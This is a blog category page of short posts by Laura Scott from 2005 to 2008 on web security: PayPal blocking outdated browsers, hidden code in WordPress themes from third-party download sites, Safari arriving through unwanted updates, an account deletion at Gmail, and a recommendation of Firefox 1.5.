security

For once, I'm wishing more sites were like PayPal

Posted 18 Apr 2008 by Laura Scott

I'm not a fan of PayPal, with its poor customer service (which is a huge deal when it comes to handling money), but I'm with them on this:

Web payment firm Paypal has said it will block "unsafe browsers" from using its service as part of wider anti-phishing efforts....

...Paypal said it was "an alarming fact that there is a significant set of users who use very old and vulnerable browsers such as Internet Explorer 4"....

...Paypal said some users were still using Internet Explorer 3 , released more than 10 years ago.

IE3?? Holy cow! I don't even think that's loaded on my old IBM Intellistation that's collecting dust in the corner.

Here's a surprise to me:

Paypal said it supported the use of Extended Validation SSL Certificates....

...The latest version of Internet Explorer support EV SSL certificates, while Firefox 2 supports it with an add-on but Apple's Safari browser for Mac and PCs does not.

(Emphasis added.)

A cautionary tale regarding theme download sites

Posted 7 Apr 2008 by Laura Scott

Via GigaOM:

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....

...There are lots of reasons a hacker may want to inject code into a page:

  • To infect visitors by exploiting a browser vulnerability
  • To place ads they can then get revenue from
  • To embed links to blogs they own, improving their page rank
  • To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.

Fear of the white hat

Posted 4 Apr 2008 by Laura Scott

Via MacWorld:

“This is not good; this is a security risk,” he said. “We’re a bank.”

Wilson said it has taken him the better part of a week to remove Safari from his network and prevent it from being reinstalled.

In an e-mail interview, Susan Bradley agreed that the updates are creating a problem for administrators and making users less secure. “It impacts all of us when more potential attack surface is installed in a group of folks that are vulnerable enough as it is,” said Bradley, who is chief technology officer with Tamiyasu, Smith, Horn and Braun, Accountancy Corp.

Of course I don't have any stats, but I wonder how many of these IT folks are the same ones keeping IE6 alive.

Another case of the inherent vulnerability of centralized apps

Posted 13 Mar 2006 by Laura Scott

In short:

You don't own it = you don't control it.

If your stuff is on someone else's turf, you have to realize that you are at an inherent disadvantage when conflict arises. They say possession is 9/10ths of the law. That is as true on the internet as it is in the "real world."

Consider Bob, who discovered that Google went and deleted his entire GMail account without warning.

...By then I sensed that something was terribly wrong, as the Google folks rarely took > 12 hours to fix such a problem. I accessed the Google Accounts page (www.google.com/accounts/), and saw the following message:

The account you attempted to access has been deleted. You may click here to sign up for a new account.

A nightmare come true?! I tried logging into my Google Account via www.google.com/accounts/Login but was presented with an invalid username/password error.

1.5 reasons to try Firefox

Posted 30 Nov 2005 by Laura Scott

If you haven't been running one of the release candidates already, you may want to get the latest and perhaps best browser to date, Firefox 1.5, now that it's been officially released. And really, if you're using another browser -- especially the buggy and unsafe Internet Explorer -- you owe it to yourself to at least try Firefox, which is safer for your machine.

That's reason one.

As a designer, Firefox is a pleasurable development in the online world. I can't speak for others, but I think websites look better in Firefox. Meanwhile, Internet Explorer, thanks to Microsoft's defiance of web standards, continues to be a nightmare for web designers who waste additional hours upon hours to hack all the Internet Explorer quirks in CSS so that IE doesn't break the website altogether.

Subscribe to security